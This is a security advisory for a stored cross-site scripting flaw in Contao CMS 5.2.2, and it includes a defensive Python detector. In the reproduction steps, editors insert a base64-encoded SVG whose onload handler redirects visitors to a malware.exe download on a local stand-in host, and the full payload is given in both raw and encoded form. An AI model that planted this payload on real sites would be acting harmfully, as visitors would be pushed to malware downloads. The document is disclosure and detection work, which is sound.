Contao CMS | XSS via base64 encoded img tag
Information
| Field | Value |
|---|---|
| Software Type | Web App |
| Software Name | Contao CMS |
| Affected Version | 5.2.2 |
| Software Vendor | Contao CMS |
| Software Link | https://github.com/contao/contao |
| Severity | Medium |
| CVSS Score | 6.8 |
| CVE Link | N/A |
| Affected Assets | 84092+ |
| Date of Discovery | March 10th, 2025 |
| PoC Exploit | N/A |
Description
In Contao, any editor can edit the contents of an article. Although filters are in place to block JavaScript and only a limited set of HTML tags is allowed, these protections can still be bypassed with an img tag whose src loads a base64-encoded SVG image.
Reproduce
Log in as an editor, navigate to /contao?do=article and pick an article to edit. In my case I picked the following article for editing:
/contao?do=article&table=tl_content&id=73
In my case, I could also visit this article without being logged in, through the following page:
This extends the impact to every user who visits the article. Encode the following payload into base64:
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200" onload="window.location.href='http://127.0.0.1:8000/malware.exe';"><rect width="200" height="200" fill="lightblue" /></svg>
Base64 encoded:
PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyMDAiIGhlaWdodD0iMjAwIiBvbmxvYWQ9IndpbmRvdy5sb2NhdGlvbi5ocmVmPSdodHRwOi8vMTI3LjAuMC4xOjgwMDAvbWFsd2FyZS5leGUnOyI+PHJlY3Qgd2lkdGg9IjIwMCIgaGVpZ2h0PSIyMDAiIGZpbGw9ImxpZ2h0Ymx1ZSIgLz48L3N2Zz4=
Create the payload with an img tag:
<img src="data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyMDAiIGhlaWdodD0iMjAwIiBvbmxvYWQ9IndpbmRvdy5sb2NhdGlvbi5ocmVmPSdodHRwOi8vMTI3LjAuMC4xOjgwMDAvbWFsd2FyZS5leGUnOyI+PHJlY3Qgd2lkdGg9IjIwMCIgaGVpZ2h0PSIyMDAiIGZpbGw9ImxpZ2h0Ymx1ZSIgLz48L3N2Zz4=" alt="XSS">
Edit the article's source code by clicking the <> button at the top of the editor and paste the payload there.
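As a defensive check added here (not code from the advisory or from Contao itself): a Python routine that decodes every data: URI found in the img tags of submitted article HTML and flags SVG payloads carrying event handlers, inline scripts or javascript: URLs, which is exactly what a tag allow-list misses. The sample article and its alert(1) payload are constructed; in a sanitizer the simplest mitigation is to reject data:image/svg+xml sources outright.

```python
import base64, re, urllib.parse
from html.parser import HTMLParser

# Markers that turn an SVG "image" into active content: scripts, on* handlers, javascript: URLs.
ACTIVE_SVG = re.compile(r"<script\b|[\s/]on[a-z]+\s*=|javascript:", re.IGNORECASE)

class _ImgSrcCollector(HTMLParser):
    """Collect the src attribute of every <img> tag in an HTML fragment."""
    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.srcs.extend(v for k, v in attrs if k == "src" and v)

def decode_data_uri(src):
    """Return (mime, payload_bytes) for a data: URI, or None for any other URL."""
    head, sep, data = src.strip().partition(",")
    if not sep or not head.lower().startswith("data:"):
        return None
    params = [p.strip().lower() for p in head[5:].split(";")]
    if "base64" not in params[1:]:
        return params[0], urllib.parse.unquote_to_bytes(data)
    try:
        # validate=False mirrors browsers, which skip stray whitespace in the data.
        return params[0], base64.b64decode(data, validate=False)
    except ValueError:  # malformed base64 cannot render, so nothing to flag
        return params[0], b""

def find_active_svg_images(html):
    """Return decoded SVGs embedded via <img src="data:..."> that carry script."""
    collector = _ImgSrcCollector()
    collector.feed(html)
    hits = []
    for src in collector.srcs:
        decoded = decode_data_uri(src)
        if decoded and "svg" in decoded[0]:
            svg = decoded[1].decode("utf-8", errors="replace")
            if ACTIVE_SVG.search(svg):
                hits.append(svg)
    return hits

def _data_img(svg):
    return '<img src="data:image/svg+xml;base64,%s" alt="x">' % base64.b64encode(svg.encode()).decode()

# Constructed sample article: the advisory's payload shape (SVG with onload) as a data URI, a benign one, and a file image.
HANDLER_SVG = '<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"><rect width="9" height="9"/></svg>'
BENIGN_SVG = '<svg xmlns="http://www.w3.org/2000/svg"><rect width="9" height="9"/></svg>'
SAMPLE_ARTICLE = "<p>Hi</p>" + _data_img(HANDLER_SVG) + _data_img(BENIGN_SVG) + '<img src="/files/logo.png">'
```

Run find_active_svg_images over SAMPLE_ARTICLE and only the onload-bearing SVG comes back; percent-encoded data URIs are decoded too, since browsers accept both forms.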
Proof of Concept (PoC) Video
Posted on: May 24, 2025 04:10 AM